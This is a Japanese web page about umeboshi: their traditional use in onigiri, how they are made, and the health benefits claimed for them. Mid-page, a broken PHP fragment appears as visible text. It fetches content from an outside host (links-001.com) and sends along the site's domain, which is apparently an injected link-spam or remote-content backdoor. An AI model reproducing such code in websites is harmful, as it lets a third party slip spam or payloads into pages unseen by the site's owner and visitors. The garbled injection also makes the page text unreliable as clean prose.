前へ
次へ

健康食として毎日一粒の梅干しを食べる

おにぎりといえば日本発祥のファストフードと言ってもいいかもしれません。
ご飯を主食とする日本においては古くから携行食として使われていたようで、もちろん今でもお弁当の中に入っていたりコンビニなどで購入して食べたりします。
海外に展開している日本のコンビニにおいても海外の食文化に合わせたおにぎりが売られているようで非常に人気があるようです。
おにぎりといえばお米が主役になるのでしょうが、それ以外にも具に何が入っているか気になるでしょう。
それぞれで好みの具は違うでしょうが、昔から良く入れられていたのが梅干しです。
梅干しは酸味が強いのが特徴ですが、その酸味が腐敗を防ぐのに役立っているようです。
今のように冷蔵技術がありませんでしたから、少しでも長くもたせようとすると梅干しを中に入れておくのはかなりいい効果があったようです。
もちろん梅独特の味が好きな人もいるでしょう。
酸味の他に塩味も適度にあるため、ご飯を美味しく食べることができます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

おにぎりの具として欠かせない梅干しですが、健康食としても知られています。
梅干しは漬物の一種で、収穫した後に一旦乾燥させたのち塩漬けをして作っていきます。
梅自体に独特の赤身があるわけではなく、塩漬けをするときに赤しそを加えることで赤い色になります。
梅には栄養成分としてクエン酸が多く含まれていて、それが梅干しになっても残っていて強い酸味として残ります。
強いが上に他の食品の腐敗を抑えてくれるのでしょう。
梅干しが健康食と言われるのはクエン酸による防腐効果以外に食欲増進効果であったり血圧が上昇するのを抑える効果もあるとされています。
注意したいのは市販されている梅干しの中には単なる梅にシソの色を付けて酢で味付けしただけのものがあることでしょう。
本来の梅干しづくりの工程を経ていないため、通常の梅干しのような健康効果は得られません。
商品名をきちんと確認すると本当の梅干しかどうかが分かるので、購入するときにチェックするようにしましょう。

Page Top